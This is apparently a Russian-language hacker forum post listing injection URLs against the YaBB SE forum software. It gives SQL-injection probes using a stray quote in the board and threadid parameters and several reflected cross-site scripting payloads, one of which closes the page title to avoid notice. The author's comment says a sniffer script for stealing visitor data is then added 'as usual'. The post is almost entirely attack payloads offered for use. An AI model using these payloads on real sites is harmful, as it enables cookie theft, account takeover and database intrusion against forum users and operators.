YaBB SE

http://site/forum/index.php?board='

http://site/forum/index.php?board=1;action=display;threadid='

http://site/forum<script>alert()</script>

http://site/forumindex.php?board=1;action=icqpager;UIN=<script >alert()</script>

http://site/forumindex.php?board=1;action=post;threadid=1;quot e=2;title=net</title><script>alert("hacked%20by")</script>
(меняем заголовок страницы на "net" и закрывает тэг заголовка. так мы не светимся. а дальше скрипт для сниффера - как всегда)


Если баги не свежие, вы ребятки не кидайтесь помидорами, я не проверял багтраки... лянота =) да и модем не позволяет =)